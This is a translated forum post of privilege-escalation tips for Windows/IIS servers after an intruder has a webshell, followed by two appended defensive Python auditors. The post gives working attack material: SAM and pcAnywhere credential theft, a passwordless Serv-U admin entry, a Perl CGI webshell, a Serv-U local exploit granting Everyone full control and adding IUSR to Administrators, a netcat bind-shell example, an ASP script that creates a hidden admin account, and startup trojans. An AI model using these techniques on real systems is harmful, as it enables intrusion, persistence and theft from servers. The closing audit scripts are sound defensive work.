Ultimate privilege-escalation tips

xiaoxiao2021-03-06  43

This article pulls together privilege-escalation ideas from many experienced people. Once we have a webshell, the next job is to escalate privileges. My own summary:

1. c:\documents and settings\all users\application data\symantec\pcanywhere\ -- check whether you can browse to this directory. If you can, that is the best case: download the .CIF file from it, recover the pcAnywhere password, and log in.

2. c:\winnt\system32\config\ -- grab the SAM from here and crack its passwords with an SAM-cracking tool such as LC4 or SAMInside.

3. c:\documents and settings\all users\"Start" menu\programs\ -- check whether you can browse here. It yields a lot of useful information, because you can see many shortcuts. We usually pick Serv-U, then view the shortcut's properties to learn where it is installed. If you can get into that directory and have permission to modify ServUDaemon.ini, add a user with an empty password:

```ini
[USER=wekwen|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
Access2=f:\|RWAMELCDP
SKEYValues=
```

This user has the highest privilege. We can then FTP in and run `quote site exec xxx` to escalate.

4. c:\winnt\system32\inetsrv\data\ -- this directory is likewise Everyone full control. All we have to do is upload the escalation tools here and execute them.

5. Can you browse to the following directories? For C:\PHP, use phpspy. For C:\perl (not necessarily this directory; again, learn the path from the shortcut properties), use a CGI webshell:

```perl
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /g;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<html><pre>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect stderr";
system($execthis);
syswrite(STDOUT, "\r\n</pre></html>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
```

Save it as a .cgi file and run it. If that does not execute, try the .pl extension: rename the .cgi file to .pl and submit http://anyhost/cmd.pl?dir. If it displays "Access Denied", the script is being executed. Now escalate: first upload su.exe (the Serv-U privilege-escalation exploit) into perl's bin directory and request http://anyhost/cmd.pl?c:/perl/bin/su.exe, which returns:

```
Serv-u > 3.x local exploit by xiaolu
usage: serv-u.exe "command"
example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
```

We are currently running with IUSR permissions. Submit:

```
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe c:\ /e /t /g everyone:f"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe d:\ /e /t /g everyone:f"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe e:\ /e /t /g everyone:f"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe f:\ /e /t /g everyone:f"
```

If the following is returned, it succeeded:

```
Serv-u > 3.x local exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
>PASS #l@l @ p
<230 User logged in, proceed.
>SITE MAINTENANCE
[ ] Creating new domain...
<200-DomainID 2
<220 Domain settings saved
[ ] Domain xl:2 created
[ ] Creating evil user
<200-User=xl
<200 User settings saved
[ ] Now exploiting...
>USER xl
<331 User name okay, need password.
>PASS 111111
<230 User logged in, proceed.
[ ] Now executing: cacls.exe c:\ /e /t /g everyone:f
<220 Domain deleted
```

All partitions now have Everyone full control. Next, upgrade our user to administrator:

```
http://anyhost/cmd.pl?c:/perl/bin/su.exe "net localgroup administrators IUSR_anyhost /add"
```

6. If you can successfully run `cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/InProcessIsapiApps`, you can use it to escalate. That command lists the privileged (in-process) DLLs:

```
idq.dll
httpext.dll
httpodbc.dll
ssinc.dll
msw3prt.dll
```

Add asp.dll to this privileged group. asp.dll lives at c:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine). Now add it:

```
cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
```

Then use `cscript adsutil.vbs get /w3svc/InProcessIsapiApps` to check that it was added.

7. You can also try this code, though the effect does not seem to be obvious:

```asp
<%@ codepage=936 %>
<%
Response.Expires = 0
On Error Resume Next
Session.Timeout = 50
Server.ScriptTimeout = 3000
Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/Administrators,group")
Set od = ob.Create("User", "wekwen$")
od.SetPassword "wekwen"   ' <---- password
od.SetInfo
Set of = GetObject(oz & "/wekwen$,user")
oe.Add(of.ADsPath)
Response.Write "wekwen$ super account established!"
%>
```

Use this code to check whether it succeeded:

```asp
<%@ codepage=936 %>
<%
Response.Expires = 0
On Error Resume Next
' list the accounts in the Administrators group
Set tn = Server.CreateObject("WScript.Network")
Set objGroup = GetObject("WinNT://" & tn.ComputerName & "/Administrators,group")
For Each admin In objGroup.Members
    Response.Write admin.Name & "<br>"
Next
If Err Then Response.Write "No: wscript.network"
%>
```

8. c:\program files\java web start\ -- this one is rare; you can try a JSP webshell here. I have heard that its privileges are low, but I have not run into it myself.

9. Finally, if the host is locked down extremely hard, you can try writing a BAT, VBS or similar trojan into C:\Documents and Settings\All Users\"Start" Menu\Programs\Startup.
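
As an added defender-side example (not part of the original post), the following Python audits a ServUDaemon.ini for accounts that look like the one added in step 3: an empty Password, Maintenance=System, and Access rules that grant write or execute rights on an entire drive root. The sample ini is constructed; the only real values in it are the key names and the step-3 account itself.

```python
import re

# Constructed sample ServUDaemon.ini; the second user mirrors the step-3 backdoor.
SAMPLE_INI = """\
[USER=webmaster|1]
Password=ei8E3F2A1C0B9D8E7F6A5B4C3D2E1F0A
Access1=d:\\wwwroot|RWAMELCDP

[USER=wekwen|1]
Password=
HomeDir=c:\\
Maintenance=System
Access1=c:\\|RWAMELCDP
Access2=f:\\|RWAMELCDP
"""

DRIVE_ROOT = re.compile(r"^[a-z]:\\?$", re.I)  # matches c:\ or f:

def parse_users(text):
    # Map each [USER=name|n] section to its keys; Access* rules go in 'access'.
    users, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"\[USER=([^|\]]+)", line, re.I)
        if m:
            current = users.setdefault(m.group(1), {"access": []})
            continue
        if line.startswith("["):  # any other section ends the user block
            current = None
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.lower().startswith("access"):
            current["access"].append(value)
        else:
            current[key.lower()] = value
    return users

def audit_serv_u(text):
    """Return (user, reason) pairs matching the traits of the step-3 account."""
    findings = []
    for name, u in parse_users(text).items():
        if u.get("password", "") == "":
            findings.append((name, "empty password"))
        if u.get("maintenance", "").lower() == "system":
            findings.append((name, "Maintenance=System (server administrator)"))
        for rule in u["access"]:
            path, _, rights = rule.partition("|")
            if DRIVE_ROOT.match(path.strip()) and set("WE") & set(rights.upper()):
                findings.append((name, "write/execute on drive root " + path))
    return findings
```

Run it over the real ServUDaemon.ini on a host you administer; any hit on a drive root or an empty password deserves a look at who could write the file, as step 3 relies on that.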

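As a second added example, again not from the original post, this Python checks two of the escalation paths above from the defender's side: it diffs the in-process ISAPI list against the five DLLs step 6 names as the normal set, and it flags IIS service accounts (IUSR_*, plus the companion IWAM_* account, which the post does not mention) in the local Administrators group, which is where step 5 ends up. Both text samples are constructed, and their layout only approximates real adsutil.vbs and net localgroup output; the parsing relies on the quoted paths and the dashed separator line rather than exact layout.

```python
import re
from os.path import basename

# The five in-process ISAPI DLLs step 6 lists as the normal set.
BASELINE = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

# Constructed sample of "adsutil.vbs get w3svc/InProcessIsapiApps" output after
# asp.dll has been appended as in step 6 (layout is illustrative only).
SAMPLE_ADSUTIL = """\
InProcessIsapiApps   : (LIST) (6 Items)
  "C:\\WINNT\\System32\\idq.dll"
  "C:\\WINNT\\System32\\inetsrv\\httpext.dll"
  "C:\\WINNT\\System32\\inetsrv\\httpodbc.dll"
  "C:\\WINNT\\System32\\inetsrv\\ssinc.dll"
  "C:\\WINNT\\System32\\msw3prt.dll"
  "C:\\WINNT\\System32\\inetsrv\\asp.dll"
"""

# Constructed sample of "net localgroup administrators" after step 5's last command.
SAMPLE_NET = """\
Alias name     administrators

Members

-------------------------------------------------------------------------------
Administrator
IUSR_ANYHOST
The command completed successfully.
"""

def unexpected_isapi(text, baseline=BASELINE):
    """Return in-process ISAPI entries whose file name is not in the baseline."""
    paths = re.findall(r'"([^"]+)"', text)
    return [p for p in paths if basename(p.replace("\\", "/")).lower() not in baseline]

def localgroup_members(text):
    """Parse member names from 'net localgroup <group>' output."""
    members, in_list = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_list = True
        elif line.startswith("The command completed"):
            break
        elif in_list and line.strip():
            members.append(line.strip())
    return members

def web_accounts_in_group(text):
    """Flag IIS accounts (IUSR_* and the companion IWAM_*) sitting in the group."""
    return [m for m in localgroup_members(text) if m.upper().startswith(("IUSR_", "IWAM_"))]
```
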
When reposting, please credit the original URL: https://www.9cbs.com/read-79269.html
